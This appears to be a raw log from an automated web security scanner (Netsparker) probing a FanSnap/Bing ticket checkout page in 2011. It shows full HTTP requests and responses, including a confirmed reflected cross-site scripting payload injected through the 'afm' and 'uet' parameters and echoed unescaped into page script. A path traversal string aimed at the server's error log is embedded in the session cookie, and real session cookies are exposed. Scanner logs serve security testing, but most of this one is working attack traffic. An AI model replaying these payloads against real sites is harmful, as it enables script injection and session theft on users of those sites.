Cookie: POOLID=B; bg_ver=1; bg_vid=1342567062754305; tvid=1342567045545985; _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4CcdeSaBjoLb2Zmc2V0af6QnQ%3D%3D--a3300cdcea78c082029ac8fe87bc1024b811df30; bg_lvd=1311100649; ver=1; vid=1342567002106881; lvd=1311100713
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 18:38:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 28
ETag: "4fec2b905dbea8da690c7c1d93dcf134"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4An4eaaBjoLb2Zmc2V0af6QnQ%3D%3D--0f671956fee172c64d233af76c77333fbc8300d9; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3769
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns:og='http://opengraphprotocol.org/schema/' xmlns:v='urn:schemas-microsoft-com:vml' xmlns='http://www.w3.org/1999/xhtml'><head><meta content='text/html;charset=UTF-8' http-equiv='content-type' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' name='description' /><meta content='sports tickets, concert tickets, theatre tickets, cheap tickets, NFL tickets, NBA tickets, NCAA tickets, MLB tickets, NHL tickets' name='keywords' /><meta content='55311985224' property='fb:page_id' /><meta content='Taking you to provider site | Bing - Ticket Search' property='og:title' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' property='og:description' /><meta content='http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fansnap-logo-sm.png?REL-fansnap-1.20.2-r31787' property='og:image' /><title>Taking you to provider site | Bing - Ticket Search</title><link href="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><!--[if lte IE 6]><link href="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-ie6gz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><![endif]--><script type='text/javascript'> //<![CDATA[ function resizeInclusion(id){ var height; if (id && document.getElementById(id)){ if (typeof(document.getElementById(id).contentWindow) == 'undefined') height = document.getElementById(id).document.body.scrollHeight; else height = document.getElementById(id).contentWindow.document.body.scrollHeight; document.getElementById(id).style.height = height + "px"; } }; //]]></script></head><body class='checkoutcontroller index '><div id='doc4'><div id='hd'></div><div id='bd'><div class='interstitial leaving'><div class='interstitial-top'></div><div class='interstitial-btm'></div><div id='checkout_desired_quantity' style='display:none'><div class='leftside'><h2>Please select the number of tickets</h2><p>Once you select a quantity, we'll take you to StubHub.</p><p><select class="quantity desired_quantity" name="desired_quantity"><option value="2">2 tickets</option></select></p><div class='continue'><input onclick='CheckoutInterstitialController.setQuantity()' style='cursor: pointer' type='button' value='Go' /><a href="#" onclick="window.close()">Return</a></div></div></div><div id='checkout_leaving' style=''><div id='interstitial_display'><div class='leftside'><div class='notice'>You are leaving Bing events, powered by FanSnap</div><div class='broker-info'><div class='broker-logo'><div class='broker-spinner'>now taking you to:</div></div><div class='broker-img'><img alt="Provider-large-511" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787" /></div><div class='clear'></div></div><div class='broker-msg'><b>Member:</b> BBB</div><div class='broker-instructions'><p><strong>StubHub</strong>can answer any questions regarding your purchase.</p></div></div><div class='clear'></div></div></div><div id='checkout_sold_out' style='display:none'><div class='leftside'><h2>Sorry! Another fan just bought those.</h2><p>You'll be returned to Bing in 5 seconds. Click below to return immediately.</p><div class='continue'><a href="#" onclick="window.close()">Return</a></div></div><div class='clear'></div></div><div id='checkout_price_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price has changed</h2><p><span class="price_str"></span>.</p><div class='continue'><input name="id" type="hidden" value="418563179" /><input name="quantity" type="hidden" value="2" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><input name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_quantity_changed' style='display:none'><div class='leftside'><h2>The quantity has changed</h2><p>Sorry! Another fan has bought some of these tickets.</p><form action='/checkout/clickout' class='confirmForm' method='get'><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_only" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></form></div></div><div id='checkout_price_and_quantity_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price and quantity has changed</h2><p><span class="price_str"></span>. Also, another fan just bought some of these tickets.</p><p>Please choose another quanity:</p><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_and_price" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_price_and_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_error' style='display:none'><div class='leftside'><h2>An error has occurred</h2><p>Sorry, we cannot take you to the provider site to purchase these tickets at this time. We have been notified of this problem. You'll be returned Bing in 5 seconds. Click below to return immediately.</p><p class='continue'><a href="#" onclick="window.close()">Return</a></p></div></div><img alt="" height="1" id="affiliatePixel" src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png?REL-fansnap-1.20.2-r31787" style="position: absolute; z-index: 9999;" width="1" /></div></div><div class='clear'></div><div id='ft'><div id='footer'>&copy; 2008-2011 FanSnap, Inc.&nbsp;-&nbsp;<a href="/about">About FanSnap</a>&nbsp;-&nbsp;<a href="/blog">Blog</a>&nbsp;-&nbsp;<a href="/providers">Partners</a>&nbsp;-&nbsp;<a href="/developers">Developers</a>&nbsp;-&nbsp;<a href="/developers/affiliates">Affiliates</a>&nbsp;-&nbsp;<a href="/contact">Contact</a>&nbsp;-&nbsp;<a href="/privacy">Privacy</a>&nbsp;-&nbsp;<a href="/sitemap">Site Map</a>&nbsp;-&nbsp;<a href="/venues">Event Venues</a>&nbsp;-&nbsp;<a href="/metro-areas">Metro Areas</a></div></div></div><div id='locationModal'><form action='#' id='changeLocationForm'><label>Zip Code:</label><input id="zipcode" name="zipcode" type="text" /><input id="saveLocation" name="commit" type="submit" value="Change" /><div id='cancelLocation'></div></form></div><div class='sp1'></div><div class='clear'></div><script type="text/javascript">//<![CDATA[var fsi__ = { ch: 'bing', srv: 'ip-10-250-26-209', bld: 'REL-fansnap-1.20.2-r31787', vstId: 161141199, usr: {id: null, e: null}, st: ''};//]]></script><script src="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type='text/javascript'> //<![CDATA[ fsTop.assetHost = 'http://cdn-%d.f6img.com/REL-fansnap-1.20.2-r31787'; fsTop.assetVersion = 'REL-fansnap-1.20.2-r31787'; //]]></script><script type="text/javascript">//<![CDATA[fsTop.channel = new Channel({"code":"bg","id":7,"name":"bing"}, true, "fansnap.com");//]]></script><script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js?REL-fansnap-1.20.2-r31787" type="text/javascript"></script><script type="text/javascript">//<![CDATA[LoggerUtil.initialize(true)//]]></script><script type="text/javascript">//<![CDATA[PageUet.initialize('seats-uet', '-776896836:7925:pgscheckout','','bing',{tag:'mt:int;sz:1254;id:389669'})//]]></script><script type="text/javascript">//<![CDATA[CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: ''"--></style></script><script>netsparker(0x00003C)</script>' });//]]></script><div class='fansnaptron' id='fbAuthModal'><iframe allowtransparency='true' frameborder='0' id='fbAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fbAuthModalClose'><a class='fbAuthClose'>Close</a></div></div><div class='survey-confirm' id='fsAuthModal'><iframe allowtransparency='true' frameborder='0' id='fsAuthTarget' marginheight='0' marginwidth='0' scrolling='no'></iframe><div class='fsAuthModalClose'><a class='fsAuthClose'><img alt="Cancel" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png?REL-fansnap-1.20.2-r31787" /></a></div></div><div id='fb-root'></div><script type='text/javascript'> //<![CDATA[ var locationChangePosition; $('#locationModal').jqm({overlay:0, trigger: false, onShow: function(h){ h.w.css({top: locationChangePosition.pageY, left: locationChangePosition.pageX}).show(); } }); function changeLocationHandler(e){ locationChangePosition = {pageX: e.clientX, pageY: e.clientY}; $('#locationModal').jqmShow(); return false; } $('#cancelLocation').click(function(){ $('#locationModal').jqmHide(); return false; }); $('#changeLocationForm').submit(function(){ $.cookie('zipcode', $('input#zipcode').val(), { path: '/'}); $('#locationModal').jqmHide(); window.location.href = window.location.href; return false; }); //]]></script><script type='text/javascript'> //<![CDATA[ window.fbAsyncInit = function() { FB.init({appId: '105579996199059', status: true, cookie: true, xfbml: true}); }; (function() { var e = document.createElement('script'); e.async = true; e.src = document.location.protocol + '//connect.facebook.net/en_US/all.js'; document.getElementById('fb-root').appendChild(e); }()); //]]></script><script type='text/javascript'> //<![CDATA[ $(function(){ try{ FSAuthentication.init({myBindHost: 'www.fansnap.com', parentHost: 'bing.fansnap.com', parentProtocol: 'http://', isLoggedIn: false, showLocation: true}); }catch(e){ } }); //]]></script><img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D161141199%3A1342567062754305%3Apgscheckout%7C%252Fcheckout%252Findex%252F418563179%26_ctx%3D%26_ts%3D1311100726%26_st%3D%26_ma%3D13%26_ref%3Dhttp%253A%252F%252Fbing.fansnap.com%252Fcheckout%252Findex%252F418563179%253Fctx%253Dc%25253Dtix%25253Bmt%25253Dint%25253Btsp%25253D0%25253Bdt%25253D1%25253Blpos%25253D2%2526ch%253Dbing%2526quantity%253D2%2526lp%253Dtrue%2526poctx%253Drank%25253D36%25253BcrawlScore%25253Dnull%25253Bpop1%25253D0.0374%25253Bpop2%25253D0.0374%25253Bpop3%25253D0.0374%25253B%2526afm%253D%2526uet%253D-776896836%25253A7925%25253Apgstickets%25257C%25257Cbing%25257Cmt%25253Aint%25253Bsz%25253A1254%25253Bid%25253A389669' width='1' /></body></html>
- /checkout/index/418563179

/checkout/index/418563179 CONFIRMED

http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D..

Parameters

Parameter Type Value
ctx GET c=tix;mt=int;tsp=0;dt=1;lpos=2
ch GET bing
quantity GET 2
lp GET true
poctx GET rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;
afm GET 3
uet GET '"--></style></script><script>alert(0x00003D)</script>
commit GET Change
zipcode GET 3

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=3&uet='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003D)%3C/script%3E&commit=Change&zipcode=3 HTTP/1.1
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: bing.fansnap.com
Cookie: POOLID=B; bg_ver=1; bg_vid=1342567062754305; tvid=1342567045545985; _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AbWQCbBjoLb2Zmc2V0af6QnQ%3D%3D--8a6a41db9d240f9878dea38ab9c71439927522b2; bg_lvd=1311100649; ver=1; vid=1342567002106881; lvd=1311100713
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Tue, 19 Jul 2011 18:38:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 24
ETag: "9c16f33d6bd5bbeb10ea45ff7d8f7661"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlNjNjY2U2NTJiNzhiMmIzMWQ1MWRhNzJiYTI4YzMyYzI6DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL2h0dHBkL2xvZ3MvZXJyb3IubG9nJmFmbT0zJnVldD0tNzc2ODk2ODM2JTNBNzkyNSUzQXBnc3RpY2tldHMlN0MlN0NiaW5nJTdDbXQlM0FpbnQlM0JzBjoGRUY6D2JnX3JlZmVyZXIiAi4BaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE4NTYzMTc5P2N0eD1jJTNEdGl4JTNCbXQlM0RpbnQlM0J0c3AlM0QwJTNCZHQlM0QxJTNCbHBvcyUzRDImY2g9YmluZyZxdWFudGl0eT0yJmxwPXRydWUmcG9jdHg9cmFuayUzRDM2JTNCY3Jhd2xTY29yZSUzRG51bGwlM0Jwb3AxJTNEMC4wMzc0JTNCcG9wMiUzRDAuMDM3NCUzQnBvcDMlM0QwLjAzNzQlM0ImYWZtPSZ1ZXQ9LTc3Njg5NjgzNiUzQTc5MjUlM0FwZ3N0aWNrZXRzJTdDJTdDYmluZyU3Q210JTNBaW50JTNCc3olM0ExMjU0JTNCaWQlM0EzODk2Njk6EGJnX3Zpc2l0X2lkaQTP0ZoJOhJiZ192aXNpdG9yX2lkSSIVMTM0MjU2NzA2Mjc1NDMwNQY7CEY6EWJnX3N0eWxlX2lkc0kiAAY7CEY6C2JnX2xvY3sKOghsYXRmGjMyLjc4MjQ5OTk5OTk5OTk5OQCPXDoIbG5nZhstOTYuODIwNzAwMDAwMDAwMDAyAPTxOhBtYXJrZXRfYXJlYWkSOhFkaXNwbGF5X25hbWUiFkRhbGxhcy1Gb3J0IFdvcnRoOhRtYV9kaXNwbGF5X25hbWVADjoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4Axkg2bBjoLb2Zmc2V0af6QnQ%3D%3D--d70070e5bec4b9b2fea7b20969f6b07a3f39c955; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3746
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns:og='http://opengraphprotocol.org/schema/' xmlns:v='urn:schemas-microsoft-com:vml' xmlns='http://www.w3.org/1999/xhtml'><head><meta content='text/html;charset=UTF-8' http-equiv='content-type' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' name='description' /><meta content='sports tickets, concert tickets, theatre tickets, cheap tickets, NFL tickets, NBA tickets, NCAA tickets, MLB tickets, NHL tickets' name='keywords' /><meta content='55311985224' property='fb:page_id' /><meta content='Taking you to provider site | Bing - Ticket Search' property='og:title' /><meta content='Compare sports tickets, concert tickets, and theatre tickets from 50+ sites all at once. Find best values fast!' property='og:description' /><meta content='http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/fansnap-logo-sm.png?REL-fansnap-1.20.2-r31787' property='og:image' /><title>Taking you to provider site | Bing - Ticket Search</title><link href="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><!--[if lte IE 6]><link href="http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-ie6gz.css?REL-fansnap-1.20.2-r31787" media="screen" rel="stylesheet" type="text/css" /><![endif]--><script type='text/javascript'> //<![CDATA[ function resizeInclusion(id){ var height; if (id && document.getElementById(id)){ if (typeof(document.getElementById(id).contentWindow) == 'undefined') height = document.getElementById(id).document.body.scrollHeight; else height = document.getElementById(id).contentWindow.document.body.scrollHeight; document.getElementById(id).style.height = height + "px"; } }; //]]></script></head><body class='checkoutcontroller index '><div id='doc4'><div id='hd'></div><div id='bd'><div class='interstitial leaving'><div class='interstitial-top'></div><div class='interstitial-btm'></div><div id='checkout_desired_quantity' style='display:none'><div class='leftside'><h2>Please select the number of tickets</h2><p>Once you select a quantity, we'll take you to StubHub.</p><p><select class="quantity desired_quantity" name="desired_quantity"><option value="2">2 tickets</option></select></p><div class='continue'><input onclick='CheckoutInterstitialController.setQuantity()' style='cursor: pointer' type='button' value='Go' /><a href="#" onclick="window.close()">Return</a></div></div></div><div id='checkout_leaving' style=''><div id='interstitial_display'><div class='leftside'><div class='notice'>You are leaving Bing events, powered by FanSnap</div><div class='broker-info'><div class='broker-logo'><div class='broker-spinner'>now taking you to:</div></div><div class='broker-img'><img alt="Provider-large-511" src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif?REL-fansnap-1.20.2-r31787" /></div><div class='clear'></div></div><div class='broker-msg'><b>Member:</b> BBB</div><div class='broker-instructions'><p><strong>StubHub</strong>can answer any questions regarding your purchase.</p></div></div><div class='clear'></div></div></div><div id='checkout_sold_out' style='display:none'><div class='leftside'><h2>Sorry! Another fan just bought those.</h2><p>You'll be returned to Bing in 5 seconds. Click below to return immediately.</p><div class='continue'><a href="#" onclick="window.close()">Return</a></div></div><div class='clear'></div></div><div id='checkout_price_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price has changed</h2><p><span class="price_str"></span>.</p><div class='continue'><input name="id" type="hidden" value="418563179" /><input name="quantity" type="hidden" value="2" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><input name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_quantity_changed' style='display:none'><div class='leftside'><h2>The quantity has changed</h2><p>Sorry! Another fan has bought some of these tickets.</p><form action='/checkout/clickout' class='confirmForm' method='get'><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_only" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></form></div></div><div id='checkout_price_and_quantity_changed' style='display:none'><form action='/checkout/clickout' class='confirmForm' method='get'><div class='leftside'><h2>The price and quantity has changed</h2><p><span class="price_str"></span>. Also, another fan just bought some of these tickets.</p><p>Please choose another quanity:</p><p><input name="id" type="hidden" value="418563179" /><input name="ctx" type="hidden" value="c=tix;mt=int;tsp=0;dt=1;lpos=2" /><select class="quantity quantity_and_price" name="quantity"><option value="0">Choose...</option></select><span class='select_quantity_prompt' style='visibility: hidden; color: red;'><-- Please select.</span></p><div class='continue'><input class="confirm_price_and_quantity_changed" name="commit" type="submit" value="Go" /><a href="#" onclick="window.close()">Return</a></div></div></form></div><div id='checkout_error' style='display:none'><div class='leftside'><h2>An error has occurred</h2><p>Sorry, we cannot take you to the provider site to purchase these tickets at this time. We have been notified of this problem. You'll be returned Bing in 5 seconds. Click below to return immediately.</p><p class='continue'><a href="#" onclick="window.close()">Return</a></p></div></div><img alt="" height="1" id="affiliatePixel" src="http://cdn-0.f6img.com/REL-fansnap-1.20.2-r31787/images/1px.png?REL-fansnap-1.20.2-r31787" style="position: absolute; z-index: 9999;" width="1" /></div></div><div class='clear'></div><div id='ft'><div id='footer'>&copy; 2008-2011 FanSnap, Inc.&nbsp;-&nbsp;<a href="/about">About FanSnap</a>&nbsp;-&nbsp;<a href="/blog">Blog</a>&nbsp;-&nbsp;<a href="/providers">Partners</a>&nbsp;-&nbsp;<a href="/developers">Developers</a>&nbsp;-&nbsp;<a href="/developers/affiliates">Affiliates</a>&nbsp;-&nbsp;<a href="/contact">Contact</a>&nbsp;-&nbsp;<a href="/privacy">Privacy</a>&nbsp;-&nbsp;<a href="/sitemap">Site Map</a>&nbsp;-&nbsp;<a href="/venues">Event Venues</a>&nbsp;-&nbsp;<a href="/metro-areas">Metro Areas</a></div></div></div><div id='locationModal'><form action='#' id='changeLocationForm'><label>Zip Code:</label><input id="zipcode" name="zipcode" type="text" /><input id="saveLocation" name="commit" type="submit" value="Change" /><div 